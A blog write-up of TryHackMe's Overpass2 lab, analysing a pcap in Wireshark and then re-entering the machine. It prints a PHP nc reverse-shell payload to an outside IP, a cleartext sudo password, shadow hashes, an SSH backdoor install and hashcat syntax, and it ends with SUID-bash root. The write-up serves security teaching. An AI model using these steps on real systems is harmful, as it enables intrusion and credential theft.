Overpass2 is the seventh machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.
That is an unusual type of machine for me. Instead of a live target we get a .pcap file with a network dump.
There are a few ways to work with .pcap files. If you do it all the time, you are most likely doing it in the terminal with tools like
If you work with .pcap files only occasionally, you are probably using the
The official guide recommends using Wireshark, so let's not play l33t hackerman this time and obey.
.pcap file to your system and open it with
It might look overwhelming, but it is not so hard to get used to after all.
If you have never worked with .pcap files before: it is a format for capturing network traffic. The first packets are placed at the top, and you can scroll down the main window to see the rest.
One of the main features of Wireshark is the ability to follow streams, which turns the packets of one conversation into a much more readable transcript.
Wireshark has tons of features; you should explore it!
The interesting part for us starts with the POST request to the /development/upload.php page. You can use the Follow HTTP Stream feature to read the details.
We can find this command in the body of the
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
The attacker is spawning a reverse shell to the IP address 192.168.170.145 on port
We can also see that the attacker is using nc as the communication channel, and we know that nc transfers all data in clear text. That means we will be able to read everything that happened on the machine, including all commands, supplied passwords, etc.
You can scroll the dump a bit and follow another stream, starting from packet number 32. It's a TCP packet, so you can use the Follow TCP Stream feature of the
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
The first thing the attacker did was upgrade the shell to a fully interactive TTY with
The next thing we can use later is the password for user james, right there in the stream (it was transferred in clear text, remember?).
james@overpass-production:~$ sudo -l
sudo -l
[sudo] password for james: whenevernoteartinstant
User james may run the following commands on overpass-production:
    (ALL : ALL) ALL
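To see what Follow TCP Stream does under the hood, here is an added example (not code from the room or the original post): it builds a tiny pcap in memory with a constructed nc shell exchange towards 192.168.170.145:4242, reassembles the conversation per connection, and pulls out the text typed after the sudo prompt, exactly the kind of secret a clear-text shell leaks. The victim address 10.10.10.10, the port 41588 and the password are constructed sample values.

```python
import socket
import struct
from collections import defaultdict
# Added example, not the room's or the post's code: build a tiny pcap in memory
# holding a plaintext nc shell and reassemble it like "Follow TCP Stream".
# 192.168.170.145:4242 is the listener from the capture; the victim address,
# its port and the sudo password below are constructed sample values.
VICTIM, ATTACKER = "10.10.10.10", "192.168.170.145"
ENDPOINTS = {"shell": (VICTIM, ATTACKER, 41588, 4242),      # victim -> listener
             "attacker": (ATTACKER, VICTIM, 4242, 41588)}   # listener -> victim
def _record(src, dst, sport, dport, payload):
    # one pcap record: Ethernet + IPv4 + TCP (PSH/ACK); checksums left at zero
    eth = b"\x00" * 12 + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    frame = eth + ip + tcp + payload
    return struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
def build_pcap(exchange):
    # exchange: [("shell"|"attacker", bytes), ...] in capture order
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # global header
    for who, data in exchange:
        out += _record(*ENDPOINTS[who], data)
    return out
def follow_tcp_streams(pcap):
    # concatenate TCP payloads per connection in capture order (no seq reordering)
    streams, off = defaultdict(bytes), 24
    while off + 16 <= len(pcap):
        caplen = struct.unpack("<IIII", pcap[off:off + 16])[2]
        frame = pcap[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if frame[12:14] != b"\x08\x00" or frame[23] != 6:   # IPv4 carrying TCP only
            continue
        ip = frame[14:14 + struct.unpack("!H", frame[16:18])[0]]
        tcp = ip[(ip[0] & 0xF) * 4:]
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            a = (socket.inet_ntoa(ip[12:16]), struct.unpack("!H", tcp[0:2])[0])
            b = (socket.inet_ntoa(ip[16:20]), struct.unpack("!H", tcp[2:4])[0])
            streams[tuple(sorted((a, b)))] += payload   # one key for both directions
    return dict(streams)
def leaked_sudo_passwords(stream):
    # in a plaintext shell, whatever follows the sudo prompt is the password
    return [line.partition(": ")[2].strip()
            for line in stream.decode(errors="replace").splitlines()
            if "[sudo] password for" in line]

SAMPLE = [("shell", b"$ "), ("attacker", b"sudo -l\n"),
          ("shell", b"[sudo] password for james: "), ("attacker", b"Constructed-Pass-1\n"),
          ("shell", b"User james may run the following commands on overpass-production:\n$ ")]
```

Run `follow_tcp_streams(build_pcap(SAMPLE))` and pass the single stream to `leaked_sudo_passwords` to recover the constructed password the same way it can be read off the real capture.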
We can also see that the attacker has a dump of
james@overpass-production:~$ sudo cat /etc/shadow
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
Feel free to crack those hashes!
The attacker also established an
james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor
james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
That's all we need to know.
Analyze the code
It’s a good idea to clone the repo and look around.
main.go contains the original hash for the backdoor and a hardcoded salt.
.pcap file we know that the attacker used the hash
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed, and from the repo we know that the hardcoded salt is
Now you can combine them in the hash:salt format and crack it!
The syntax for hashcat, for instance (you can use other tools if you want):
hashcat -m 1710 -a 0 -o password.txt hash.txt /usr/share/wordlists/rockyou.txt
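What mode 1710 and the hash:salt line actually stand for, as an added example that is not the backdoor's own code: SHA-512 over the password followed by the salt, hex-encoded, which is the value the backdoor compares a login attempt against. The salt, password and candidate list are constructed values, not the repo's real salt.

```python
import hashlib

# Added example, not code from the ssh-backdoor repo or the post. Reproduces the
# scheme hashcat mode 1710 targets, sha512($pass.$salt) as lowercase hex. The
# salt, password and candidates are constructed sample values, not the repo's.
CONSTRUCTED_SALT = "0123456789abcdef0123456789abcdef"

def backdoor_hash(password, salt):
    # SHA-512 over password followed by salt, hex-encoded
    return hashlib.sha512((password + salt).encode()).hexdigest()

def is_sha512_hex(hash_hex):
    # sanity check before feeding hashcat: a SHA-512 digest is 128 hex chars
    return len(hash_hex) == 128 and all(c in "0123456789abcdef" for c in hash_hex)

def hashcat_1710_line(hash_hex, salt):
    # the hash:salt line the post builds for hashcat -m 1710
    if not is_sha512_hex(hash_hex):
        raise ValueError("not a SHA-512 hex digest")
    return f"{hash_hex}:{salt}"

def recovered_password(hash_hex, salt, candidates):
    # Confirm which candidate reproduces the observed hash under this scheme,
    # e.g. to double-check a cracked password with the salt from main.go.
    return next((c for c in candidates if backdoor_hash(c, salt) == hash_hex), None)
```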
Get back in!
Now we have everything we might need to exploit the machine one more time.
Since we already know all the details about the backdoor, we can use it as a shortcut and not re-exploit the machine from scratch.
ssh is not running on the default port
ssh -p 2222 firstname.lastname@example.org
Use the password you just cracked to log in.
Privilege escalation is simple this time.
Let’s look around:
james@overpass-production:/home/james$ ls -la
total 1136
drwxr-xr-x 7 james james    4096 Jul 22 03:40 .
drwxr-xr-x 7 root  root     4096 Jul 21 18:08 ..
lrwxrwxrwx 1 james james       9 Jul 21 18:14 .bash_history -> /dev/null
-rw-r--r-- 1 james james     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 james james    3771 Apr  4  2018 .bashrc
drwx------ 2 james james    4096 Jul 21 00:36 .cache
drwx------ 3 james james    4096 Jul 21 00:36 .gnupg
drwxrwxr-x 3 james james    4096 Jul 22 03:35 .local
-rw------- 1 james james      51 Jul 21 17:45 .overpass
-rw-r--r-- 1 james james     807 Apr  4  2018 .profile
-rw-r--r-- 1 james james       0 Jul 21 00:37 .sudo_as_admin_successful
-rwsr-sr-x 1 root  root  1113504 Jul 22 02:57 .suid_bash
drwxrwxr-x 3 james james    4096 Jul 22 03:35 ssh-backdoor
-rw-rw-r-- 1 james james      38 Jul 22 03:40 user.txt
drwxrwxr-x 7 james james    4096 Jul 21 01:37 www
There is a hidden
.suid_bash binary with the
You can run it to get root, but keep in mind that you need to pass the -p flag: without it bash drops the effective privileges the SUID bit gives it and you stay james.
james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# whoami
root
- The ability to analyze dumps and logs can be priceless.
- Going through this machine is like reading a writeup; you can learn a lot from it.
Do you like this content?
You can follow me on Twitter so you don't miss new posts!